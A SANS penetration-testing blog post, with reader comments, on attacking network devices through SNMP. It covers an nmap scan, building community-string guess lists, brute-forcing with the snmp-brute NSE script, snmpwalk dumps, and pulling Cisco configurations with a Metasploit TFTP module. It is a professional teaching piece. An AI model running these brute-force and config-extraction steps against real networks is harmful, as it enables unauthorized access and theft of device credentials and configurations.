SANS Penetration Testing

Invasion of the Network Snatchers: Part I

[Editor's Note: In this article, Tim Medin discusses methods for penetration testing network infrastructure components, specifically through the Simple Network Management Protocol (SNMP). Tim's tips below include a nice overview of SNMP, techniques for formulating highly useful lists of potential authentication credentials for SNMP, a description of how to use an Nmap NSE script for password-guessing SNMP, ideas for using snmpwalk to extract config info, and a description of a Metasploit module for harvesting SNMP info from a bunch of devices. He's got some great command-line kung fu throughout as well. It's a cornucopia of useful ideas. These techniques can be really helpful in showing security risks in a target organization's network infrastructure. Thanks, Tim! -Ed.]

By Tim Medin

Part of one of Sun Tzu's (overly used) quotes is, "Water shapes its course according to the nature of the ground over which it flows...". I often hear people say, "blah blah blah be like the water". Being flexible like water is great (although it's kinda wishy washy and you'd be all wet). But, wouldn't it be better if we could become the ground and control all of the water and where it goes? That is what I like to do on penetration tests by targeting the network equipment.

Often times, the network topology and traffic flow is seen as an unmovable riverbed. It doesn't really change and takes some sort of special unspoken power to change. Traffic goes from A through B to get to C where it goes through a firewall and an IPS. How much more fun would it be to skip the lines and jump right on the network next to your target, bypassing all of the security controls?

To do this, we first need access to the networking gear. In larger organizations, authentication to the network devices is often controlled by TACACS or Radius, which are used to centrally manage and log authentication. This approach allows network admins to login to their gear using a domain account (often the same domain account they use to check their email, but I digress). There are plenty of ways pen testers can attack these accounts, so we'll move on to another vector, attacking the Simple Network Management Protocol (SNMP).

Pretty much all networking gear can be managed and monitored via SNMP. Fortunately for us, this service is often not as thoroughly hardened as the normal TCP services (SSH, HTTP(S), and Telnet). It usually isn't logged and doesn't offer any sort of lockout mechanism. It also has some glaring security shortcomings. All things that are good for penetration testers.

SNMP comes in 3 versions: 1, 2c, and 3. Version 1 and 2c are identical from a security point of view. They only validate authenticate via a community string (think password without a username) and they don't offer encryption or message integrity. Version 3 fixes these problems and implements mechanisms to protect the confidentiality and integrity of the transmission.

It is going to be much easier to guess the credentials of services using v1 and v2c, since v3 requires a username and a community string and v1/2c does not. Let's get ready to brute force password guess our buddies SNMP v1 and v2c!

Before we can brute, we first need a good list of targets that speak SNMP. Our handy-dandy friend, Nmap, can take care of finding those as follows:

$ sudo nmap -PN -sU -p 161 -iL targets.txt -oA output

This nmap command will probe a list of targets (-iL) from the file targets.txt using UDP (-sU) port 161, the SNMP port, and save the output in all three nmap formats (-oA) into files with a basename of output, including output.nmap, output.gnmap, and output.xml. For speed and efficiency, the host discovery checks (-PN) are disabled as we only want to send a single packet on port 161. One important thing to note: this scan takes advantage of the differences in SNMPv3 to get a response (without authentication) and it will miss devices that only speak v2c or v1. Technically, we end up with a list of devices that speak SNMPv3, but often devices running SNMPv3 also support v2c (and even v1). So, in many organizations, this list of SNMPv3 systems will be useful for v2c and v1 community string brute force guessing.

Now let's get a list of devices that are running SNMP by grep'ing through nmap's grepable output.

$ grep '161/open/' output.gnmap | cut -d' ' -f 2 > snmpdevices.txt

Here, we are looking for the string indicating that port 161 is open from our output.gnmap file. We're piping that through the cut command to look through our space-delimited output (-d' '), extracting the second field (-f 2), which will hold the IP addresses of our potential targets. We store our results in a file very cleverly named snmpdevices.txt.

Next, we need to try to guess the v1/v2c community strings used to authenticate to these devices. There are usually two types of community strings: read-write and read-only. Admins will often differentiate the community type string by appending the access level to it (e.g., sometext-read/sometext-write, sometext-public/sometext-private). Let's create a list of basewords and suffixes and then combine them.

$ cat << EOF > basewords.txt
companyname
CompanyName
company
Company
productname
ProductName
Admin
admin
Secret
secret
EOF

$ cat << EOF > suffixes.txt
read
Read
write
Write
readonly
ReadOnly
public
Public
private
Private
rw
RW
ro
RO
EOF

Now that we have the basewords and suffixes we can combine them to create a mashup wordlist.
$ for GUESS in `cat basewords.txt`; do for SUFFIX in `cat suffixes.txt`; do echo $GUESS$SUFFIX; echo $GUESS-$SUFFIX; done; done > combo-clean.txt

$ head -n 5 combo-clean.txt
companynameread
companyname-read
companynameRead
companyname-Read
companynamewrite

Admins often use l337sp34k to make the strings harder to guess. So let's l33tify the guesses. John the Ripper has some nice mangling features, so let's take advantage of them.

The people over at KoreLogic have developed some fantastic mangling rules for John the Ripper. Using the rules is quite simple. Just download the rules and then append them to your john.conf (instructions are included on their site). Once the rules are installed, we can use them to mangle our existing guessing with l33t combinations.

$ john -wordlist:combo-clean.txt -rules:KoreLogicRulesL33t -stdout > combo-l33t.txt

We should also download a list of default community strings. Just because admins are leet, doesn't mean they don't miss things. Default passwords and community strings are tremendously useful. We'll take the list of the combinations, l33t combinations, and the default strings to make a bigger dictionary. We'll then remove any duplicates and anything longer than 20 characters.

$ cat wordlist-common-snmp-community-strings.txt combo-clean.txt combo-l33t.txt | sort -u | grep -vE '.{21,}' > completeguesses.txt

Ok, so we've got a good list. Now we need to use it — Nmap to the rescue (again)! The snmp-brute NSE script is great for guessing community strings. There are other tools that do it, but I greatly prefer nmap.

$ nmap -sU 1.2.3.4 -script snmp-brute -script-args snmp-brute.communitiesdb=completeguesses.txt
Nmap scan report for 1.2.3.4
PORT STATE SERVICE
161/udp open snmp
| snmp-brute:
|_ C0mpanyNam3-RW - Valid credentials

Winner! Winner! Chicken Dinner!

We have a target and a working community string. It is highly likely that this is a read-write string based on its name (C0mpanyNam3-RW). Now, we need to extract some useful data from the device.

For those of you unfamiliar with SNMP, all the data and configuration settings in a device are located in a hierarchal tree. Each location on that tree is identified by an OID (Object Identifier). You can do a little searching and find names that are associated with each node [e.g. Iso(1).org(3).dod(6).internet(1)... ], but I don't use it enough to really care. All I really need is the root location of 1.3.6.1. When I need something else, I google for it or grep through the results of a full dump. A full dump can be extracted using the snmpwalk tool (BTW, this technique is VERY useful against printers for extracting usernames, computer names, and document names).

$ snmpwalk -c C0mpanyNam3-RW -v 2c 1.2.3.4 1.3.6.1 > ciscosnmpdump.txt

Before we dig too much into this file, let's figure out what this device is. We'll use SNMP to query the SysDescr (OID 1.3.6.1.2.1.1.1) and get some details on the device.

$ snmpget -c C0mpanyNam3-RW -v 2c 1.2.3.4 1.3.6.1.2.1.1.1
Cisco Internetwork Operating System Software IOS ™ 2500...

Oh, this is even better. We can dump the configuration file from a Cisco device using SNMP and a TFTP server. It's even easier since Metasploit has a module to do this!

Admins commonly use the same community string across all network devices. So once we get a community string that works on one device, we can likely use it against all the networking devices. The RHOSTS option (notice it is plural) accepts multiple targets. It will even accept a file.

msf> auxiliary/scanner/snmp/cisco_config_tftp
msf auxiliary(cisco_config_tftp)> set LHOST 1.1.1.1
msf auxiliary(cisco_config_tftp)> set OUTPUTDIR /tmp/
msf auxiliary(cisco_config_tftp)> set RHOSTS file:/tmp/snmpdevices.txt
msf auxiliary(cisco_config_tftp)> set COMMUNITY C0mpanyNam3-RW
msf auxiliary(cisco_config_tftp)> run

After this runs, we'll have a bunch of configurations files saved in our /tmp directory.

What can we do once we have a pile of Cisco configuration files? You'll have to check back for the next installment because this is where things get really crazy!

-Tim Medin
Counter Hack

 

4 Comments

Posted June 5, 2013 at 10:40 AM | Permalink | Reply

Robin

Three questions:
1. Why does the nmap scan miss servers not running version 3? Do versions 1 and 2c not reply when prodded?
2. Do you have a good list of common default community strings?
3. Are there any good, generic, tools for interpreting results and writing back if you have a private string? I know I can pull things out with strings and most of the time just reading through it you can understand what stuff means, but where possible I'll try to find the official admin tool for an app and give that the strings. A generic app would be very useful though, even if it just covered a bunch of common devices.

Posted June 5, 2013 at 2:19 PM | Permalink | Reply

Tim Medin

@Robin
1. The nature of UDP means that you don't know if the server isn't running the service or if you sent the wrong packet. V1 and 2c will only repsond if you have the correct community string. V3 will responde as part of the encryption setup without authentication.
2. The link didn't show in the post for some reason, but this is the best list I've found https://code.google.com/p/fuzzdb/source/browse/trunk/wordlists-misc/wordlist-common-snmp-community-strings.txt
3. I don't know of an app that will do that. When I dump the SNMP data from a printer or network device I use lots of grep. To quickly read all the text I run "grep '' STRING:' snmpdump.txt" (note the space before STRING, it filters out HEXSTRING). To modify settings I research the remote device and figure out a way to change the configuration I want, usually a password to a TCP based service. I shortcut would be nice but I don't know if it exists.

Posted June 7, 2013 at 12:20 PM | Permalink | Reply

Joanne

Interesting read/advice penetration testing is vital for protecting data. Its the only way to test how the infrastructure is coping with a massive increase of threats and hackers.

Posted December 21, 2015 at 12:04 AM | Permalink | Reply

moonrock shoes for sale

Woah! I'm really digging the template/theme of this website.
It's simple, yet effective. A lot of times it's very difficult tto get that "perfect balance" between superb usability and
appearance. I must say you have done a sperb job wth this.
Additionally, the blog loads super fast for me on Firefox.
Outstanding Blog!

Post a Comment






Captcha


* Indicates a required field.